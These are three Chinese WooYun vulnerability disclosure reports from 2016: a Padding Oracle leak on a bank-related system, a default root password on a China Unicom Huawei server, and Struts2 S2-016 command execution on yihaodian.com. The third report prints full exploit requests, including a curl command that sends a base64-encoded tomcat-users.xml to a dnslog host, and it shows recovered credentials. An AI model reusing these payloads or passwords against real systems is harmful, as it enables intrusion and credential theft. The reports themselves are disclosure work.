漏洞详情披露状态： 2016-05-12： 细节已通知厂商并且等待厂商处理中2016-05-12： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-17： 厂商已经主动忽略漏洞，细节向公众公开简要描述：Padding Oracle Vulnerability漏洞详细说明：系统地址：http://bisbj.unibankmedia.com/login.aspx安全性要求挺高，需要USBKey才能登录但是code 区域http://bisbj.unibankmedia.com/WebResource.axd?d=WCX_nB4YLXQ_q3tyr6GjWMG6nOw2fLPWD_z9RtbqqpQ1&t=633750802290014532漏洞证明： http://bisbj.unibankmedia.com/ScriptResource.axd?d=iVQlt5o3Ai_H7tAPRiZ4f_LSC4nhMgY-89r9cABp1IkAAAAAAAAAAAAAAAAAAAAA0得到配置看操作手册上写着，该系统应该是作用于银行的配置里泄漏了相关的证书，内网ftpuser、数据库连接等信息 修复方案：补丁版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-17 15:40厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：中国联通北京分公司华集群机房某华为Tecal E6000 MM刀片服务器弱口令导致telnet命令执行详细说明：貌似集群机房联通宽带宝典天玥网络安全审计系统**.**.**.****.**.**.**ocean stor ism等登录界面：摘要信息：漏洞证明： code 区域**.**.**.** name:root password:huaweiosta--------------------------------------------------------------------------------ip：imana web：远程控制：    ------------------------------------TELNET-------------------------------------code 区域Name: root password:huaweiosta执行HELP命令执行DIR命令修复方案：你懂得版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-28 17:37厂商回复：CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给北京分中心，由北京分中心后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-11： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述： 详细说明：@lijiejie 的 WooYun: 腾讯移动端某功能SSRF可探/漫游内网（cloudeye神器案例） 提到两个url跳转，一看便知是s2-016命令执行。code 区域http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218tms2.yihaodian.com 好像修复了，但3pl.yihaodian.com仍未修复。code 区域POST /system/login_view.action HTTP/1.1 User-Agent: curl/7.33.0 Host: 3pl.yihaodian.com Accept: */* Proxy-Connection: Keep-Alive Content-Length: 196 Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987 --------------------------4a606c052a893987 Content-Disposition: form-data; name="redirect:${#application.get('javax.servlet.context.tempdir')}" -1 --------------------------4a606c052a893987-- 测试过程中发现过滤了一些字符，不能出现 "java.lang"等。换了个exp，使用java的scriptengine来调用java方法：code 区域POST /system/login_view.action HTTP/1.1 User-Agent: curl/7.33.0 Host: 3pl.yihaodian.com Accept: */* Proxy-Connection: Keep-Alive Content-Length: 396 Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987 --------------------------4a606c052a893987 Content-Disposition: form-data; name="redirect:${new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['/bin/sh','-c','curl xxoo.dnslog.info/$(cat /usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)']).start()\u003B")}" -1 --------------------------4a606c052a893987-- 读取tomcat-users.xml获取tomcat管理用户跟密码并发送到cloueye，收到请求如下: 漏洞证明：base64解码得到:code 区域<?xml version='1.0' encoding='utf-8'?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <tomcat-users> <role rolename="manager"/> <user username="monitor" password="OPS-monitoR" roles="manager"/> <!-- <role rolename="tomcat"/> <role rolename="role1"/> <user username="tomcat" password="tomcat" roles="tomcat"/> <user username="both" password="tomcat" roles="tomcat,role1"/> <user username="role1" password="tomcat" roles="role1"/> --> </tomcat-users>成功登陆tomcat:tms2.yihaodian.com也配置了相同的用户和密码，也登录成功:修复方案：.版权声明：转载请注明来源 loopx9@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：5确认时间：2016-05-11 12:28厂商回复：非常感谢！！ 尽快整改。最新状态：暂无